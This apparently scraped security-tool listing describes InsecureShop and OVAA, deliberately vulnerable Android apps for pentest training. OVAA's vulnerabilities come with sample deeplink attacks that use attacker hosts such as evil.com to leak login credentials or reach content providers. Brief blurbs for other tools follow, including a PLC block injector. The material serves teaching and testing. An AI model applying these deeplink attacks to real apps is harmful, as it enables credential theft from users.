InsecureShop
0 (0)
Android application for learning about vulnerabilities in modern Android apps and testing pentesting skills.
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. List of vulnerabilities: - Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider. - Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=.... - Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(
Android application for learning about vulnerabilities in modern Android apps and testing pentesting skills.
House: A runtime mobile application analysis toolkit with a Web GUI, powered by Frida, written in Python.
PLCinject is a tool for injecting and patching blocks on PLCs with a call instruction.
A security checklist app for your Mac that helps you with basic security hygiene and prevents 80% of problems.
A data-mining and deep web asset search engine for breach analysis and prevention services.
A tool for quantitative risk analysis of Android applications using machine learning techniques.